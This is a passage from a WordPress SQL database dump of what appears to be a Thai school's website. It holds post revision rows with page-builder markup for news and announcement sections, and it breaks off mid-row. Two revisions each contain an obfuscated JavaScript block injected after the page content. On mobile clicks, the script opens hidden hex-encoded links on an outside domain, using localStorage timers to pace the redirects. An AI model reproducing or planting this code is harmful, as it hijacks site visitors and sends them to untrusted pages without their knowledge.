{\"blockId\":\"4bx7msyz\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"offset\":\"0\",\"showCustomField\":false,\"showContent\":false,\"showPagination\":true,\"thumbnailEffect\":\"cveffect-zoomin\",\"responsiveImg\":true,\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"},{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}]} /-->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"bi9dfd8i\",\"whichLayout\":\"layout2\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"offset\":\"0\",\"showTaxonomy\":false,\"showCustomField\":false,\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":100},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"responsiveImg\":true,\"postsPerPage\":\"3\",\"headingText\":\"วารสารประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"วารสารประชาสัมพันธ์\",\"value\":\"%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}]} /-->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','ข่าวประชาสัมพันธ์','','inherit','closed','closed','','355-revision-v1','','','2024-08-21 13:56:50','2024-08-21 06:56:50','',355,'http://pakhaeng.ssk.in.th/?p=1049',0,'revision','',0),
(1050,1,'2024-08-21 13:56:52','2024-08-21 06:56:52','<!-- wp:generateblocks/container {\"uniqueId\":\"bafb5847\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:image {\"id\":1047,\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Is-It-a-Gift-Instagram-Post-1-1.png\" alt=\"\" class=\"wp-image-1047\"/></figure>\n<!-- /wp:image -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"4bx7msyz\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"offset\":\"0\",\"showCustomField\":false,\"showContent\":false,\"showPagination\":true,\"thumbnailEffect\":\"cveffect-zoomin\",\"responsiveImg\":true,\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"},{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}]} /-->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"bi9dfd8i\",\"whichLayout\":\"layout2\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"offset\":\"0\",\"showTaxonomy\":false,\"showCustomField\":false,\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":100},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"responsiveImg\":true,\"postsPerPage\":\"3\",\"headingText\":\"วารสารประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"วารสารประชาสัมพันธ์\",\"value\":\"%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}]} /-->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','ข่าวประชาสัมพันธ์','','inherit','closed','closed','','355-revision-v1','','','2024-08-21 13:56:52','2024-08-21 06:56:52','',355,'http://pakhaeng.ssk.in.th/?p=1050',0,'revision','',0),
(1051,1,'2024-08-21 13:57:51','2024-08-21 06:57:51','<!-- wp:generateblocks/image {\"uniqueId\":\"285d6904\",\"mediaId\":892,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-285d6904\"><img class=\"gb-image gb-image-285d6904\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Is-It-a-Gift-Instagram-Post-2.png\" alt=\"\" title=\"Is It a Gift Instagram Post\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f5e8d6af\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:kadence/tabs {\"uniqueID\":\"871_e416be-74\",\"tabCount\":7,\"layout\":\"vtabs\",\"contentBgColor\":\"var(\\u002d\\u002dglobal-palette9, #ffffff)\",\"contentBorderStyles\":[{\"top\":[\"#0a6689\",\"\",3],\"right\":[\"#0a6689\",\"\",0],\"bottom\":[\"#0a6689\",\"\",0],\"left\":[\"#0a6689\",\"\",0],\"unit\":\"px\"}],\"titles\":[{\"text\":\"ข้อมูลพื้นฐาน\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"\\u003cstrong\\u003eการบริหารงานและการใช้จ่ายงบประมาณ\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"\\u003cstrong\\u003eการจัดซื้อจัดจ้าง\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"\\u003cstrong\\u003eการบริหารและพัฒนาทรัพยากรบุคคล\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\"},{\"text\":\"\\u003cstrong\\u003eการส่งเสริมความโปร่งใส\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\"},{\"text\":\"\\u003cstrong\\u003eการดำเนินการเพื่อป้องกันการทุจริตในประเด็นส